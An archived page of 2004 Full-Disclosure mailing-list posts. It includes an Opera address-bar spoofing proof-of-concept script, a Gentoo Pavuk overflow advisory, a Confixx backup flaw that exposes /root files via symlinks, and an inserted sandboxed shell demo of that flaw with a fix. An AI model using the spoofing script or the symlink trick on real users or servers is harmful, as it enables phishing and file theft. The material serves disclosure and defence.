_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] Opera 7.53 (Build 3850) Address Bar Spoofing Issue

From: bitlance winter (bitlance_3hotmail.com)
Date: Mon Jul 26 2004 - 08:02:11 CDT


Hello List.

I am reporting the
Opera 7.53 (Build 3850) Address Bar Spoofing Issue,
tested on Windows OS.

==== begin of PoC
[script]
function fake() {
  oc=window.open('http://www.opera.com/', '','location=1');
  oc.location.replace('http://www.example.com');
}
[/script]
[a href="javascript:void(0);"
onClick="fake()"]http://www.opera.com/[/a]
==== end of PoC

Best Regards.

--
bilance winter



 
[Full-Disclosure] [ GLSA 200407-19 ] Pavuk: Digest authentication helper buffer overflow

From: Kurt Lieber (kliebergentoo.org)
Date: Mon Jul 26 2004 - 09:27:00 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Pavuk: Digest authentication helper buffer overflow
      Date: July 26, 2004
        ID: 200407-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Pavuk contains a bug that can allow an attacker to run arbitrary code.

Background
==========

Pavuk is a web spider and website mirroring tool.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  net-misc/pavuk     <= 0.9.28-r2                     >= 0.9.28-r3

Description
===========

Pavuk contains several buffer overflow vulnerabilities in the code
handling digest authentication.

Impact
======

An attacker could cause a buffer overflow, leading to arbitrary code
execution with the rights of the user running Pavuk.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of Pavuk.

Resolution
==========

All Pavuk users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-misc/pavuk-0.9.28-r3"
    # emerge ">=net-misc/pavuk-0.9.28-r3"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0



 
RE: [ok] [Full-Disclosure] Possible Virus/Trojan

From: Todd Towles (toddtowlesbrookshires.com)
Date: Sun Jul 25 2004 - 22:05:46 CDT


It is a very smooth idea if it is a new e-mail worm. I haven't been able to
find any information from any AV companies on something like this. If it is
some kiddie trying to be smooth with me, this could be a new technique to
come.

-----Original Message-----
From: Andrew Farmer [mailto:andfarmteknovis.com]
Sent: Sunday, July 25, 2004 6:06 PM
To: Curt Purdy
Cc: 'Mailing List - Full-Disclosure'; 'Todd Towles'
Subject: Re: [ok] [Full-Disclosure] Possible Virus/Trojan

On 25 Jul 2004, at 12:06, Curt Purdy wrote:
> Todd Towles wrote:
>> I received an e-mail today that looked very much like a virus. Here
>> is the message
>>
>> Attachment - erupts.avi.exe
>
>> Subject - New Southern California wildfire erupts
>
> <snip>
>
>> Either this is a new Trojan that changes its body and subject based on
>> the current AP news or someone used a very lame trick against me.
>> =)
>
> I'm guessing the latter. Although story scraping would be possible,
> intelligent naming of the .exe would not be. Most likely a friend... or
> enemy.

Sure it would be. In this case, at least, the executable is just named
based on the last word of the headline plus ".avi.exe".



 
RE: [ok] [Full-Disclosure] Possible Virus/Trojan

From: Willem Koenings (iseceurope.com)
Date: Mon Jul 26 2004 - 08:17:26 CDT


hi,

----------------------------------------

If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- former White House cybersecurity adviser Richard Clarke
 
btw, is there amount of money or amount of time under a question? :)

willem.
--


 
Re: FW: [Full-Disclosure] Question for DNS pros

From: Paul Schmehl (paulsutdallas.edu)
Date: Mon Jul 26 2004 - 10:59:43 CDT


--On Monday, July 26, 2004 08:58:48 AM +0200 Paul Rolland <rolwitbe.net>
wrote:

>
> Seems to be a query for the NS for the "." (root) zone.

Well, you're correct about that.

> The machine sending the queries is probably configured to use
> your server as a complete DNS resolver and transfer all its queries
> to your server.
>
Umm...I don't *have* a server at that address. In fact, there is no live
host at all at that address. *That*, after all, is the entire point of
this thread.

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/



 
RE: [Full-Disclosure] Affordable Network Behavior Analysis alternatives

From: Steven Rakick (stevenrakickyahoo.com)
Date: Mon Jul 26 2004 - 10:56:30 CDT


Hi Heather,

I wouldn't worry about it. Our account rep told me
that Intrusense should be releasing nSight 1.2 this
week anyways. I'm sure there will be an evaluation
version available.

Steve

--- "Heather M. Guse Bryan" <hbryandpntech.com>
wrote:
> Unfortunately they closed the beta program.
>
> Too bad, I was interested in it.
>
> -----Original Message-----
> From: Steven Rakick [mailto:stevenrakickyahoo.com]
> Sent: Thursday, July 22, 2004 12:48 PM
> To: full-disclosurelists.netsys.com
> Cc: jeff.gilliangmail.com
> Subject: Re: [Full-Disclosure] Affordable Network Behavior Analysis alternatives
>
>
> Jeff,
>
> You may want to take a look at the nSight behavior
> analysis product from Intrusense
> (http://www.intrusense.com).
>
> We were actually in a similar bind a while back and
> came across their beta program. We've been using it
> ever since and will be buying it as soon as their
> release version comes out.
>
> It has both standalone and distributed installation
> types and dead simple to install and configure.
> Overall it has less functionality than QRadar but it
> made up for that in cost. While we haven't
> *officially* purchased it yet, we were quoted under
> $10,000 for the distributed version with support for
> 3 collector agents.
>
> Still too much? You may also want to take a look at
> Snort and Ntop then.
>
> Feel free to email me if you want more details.
>
>
> Steve
>
>
> -------------------------------------------
> Thu, 22 Jul 2004 13:33:15 -0400
> Jeff Gillian jeff.gilliangmail.com wrote:
>
> Hi list,
>
> Since it appears the SecurityFocus Sectools and IDS lists are dead, I
> thought I'd repost this here.
>
> I recently saw a posting on FocusIDS regarding the high cost of the
> most commercial solutions. The one mentioned was the QRadar product
> from Q1Labs. Don't get me wrong, we have a budget, we just don't have
> a Fortune 500 budget. :)
>
> My question is simple, are there any other commercial out-of-the-box
> alternatives to QRadar? Something that isn't going to cost me >$40,000
> to deploy?
>
> Any input would be appreciated.
>
> Regards,
>
> Jeff G.

                


 
Re: [Full-Disclosure] Security hole in Confixx backup script

From: Dirk Pirschel (dirkpirschel.de)
Date: Mon Jul 26 2004 - 18:57:04 CDT


Hi,

* Dirk Pirschel wrote on Fri, 25 Jun 2004 at 15:08 +0200:

> A malicious backup request via the webinterface might be used by any
> user to read files located in /root (which is the default installation
> directory of confixx).

Confixx does a "cd $dir; tar czf ..." without any error checking. If
the target directory does not exist, the backup is done in the current
working directory, which is /root.

It is possible to retrieve *any* directory by replacing $HOME/files or
$HOME/html with a symlink.

> If you are using confixx, you should disable the backup script.

-Dirk

--
Linux - Life is too short for reboots
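
The failure mode described in the message above (a `cd` whose result is never checked, followed by `tar`), shown beside a checked form. This is an added example, not part of the original post and not Confixx code; the function names `backup_unchecked`, `backup_checked` and `demo` and all sandbox paths are constructed for illustration.

```shell
#!/bin/sh
# Added example; every path below is constructed inside a mktemp sandbox.

# Pattern from the post: cd's exit status is ignored, so when $1 is
# missing, tar archives whatever the current working directory is.
backup_unchecked() {            # $1 = directory, $2 = archive path
    ( cd "$1" 2>/dev/null; tar czf "$2" . )
}

# Hardened form: reject a symlinked target, stop when cd fails, and
# confirm the physical directory is still below the user's home.
backup_checked() {              # $1 = home, $2 = subdir, $3 = archive path
    [ ! -L "$1/$2" ] || return 1
    home_real=$(cd "$1" 2>/dev/null && pwd -P) || return 1
    (
        cd "$1/$2" 2>/dev/null || exit 1
        case "$(pwd -P)/" in
            "$home_real"/*) tar czf "$3" . ;;
            *) exit 1 ;;
        esac
    )
}

# Builds a sandbox, runs three cases, and prints one word per case:
# "leak" if private.txt ended up in the archive, otherwise "safe".
demo() (
    box=$(mktemp -d) || exit 1
    mkdir -p "$box/cwd" "$box/home" "$box/other"
    echo secret > "$box/cwd/private.txt"      # stands in for /root
    echo secret > "$box/other/private.txt"    # directory outside the home
    ln -s "$box/other" "$box/home/html"       # html replaced by a symlink
    cd "$box/cwd" || exit 1
    out=""
    for variant in unchecked-missing checked-missing checked-symlink; do
        rm -f "$box/a.tgz"
        case $variant in
            unchecked-missing) backup_unchecked "$box/home/files" "$box/a.tgz" || : ;;
            checked-missing)   backup_checked "$box/home" files "$box/a.tgz" || : ;;
            checked-symlink)   backup_checked "$box/home" html "$box/a.tgz" || : ;;
        esac
        if [ -f "$box/a.tgz" ] && tar tzf "$box/a.tgz" | grep -q private.txt
        then out="$out leak"; else out="$out safe"; fi
    done
    cd / && rm -rf "$box"
    echo "${out# }"
)
demo    # prints: leak safe safe
```

The checks narrow the problem but do not replace running the backup with the requesting user's own privileges, which keeps files the user cannot read out of the archive regardless of where `tar` ends up.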



 
[Full-Disclosure] Simple script to test IE zones

From: BillyBobKnob (billybobknobhotmail.com)
Date: Mon Jul 26 2004 - 11:19:03 CDT


Does anyone have a simple script that can be posted to a static webpage to
test all IE zones for latest vulnerabilities to Active X and Active
Scripting exploits without being intrusive ?

Thanks.
Bill



 
[Full-Disclosure] Re:

From: Thor (thorpivx.com)
Date: Mon Jul 26 2004 - 13:25:43 CDT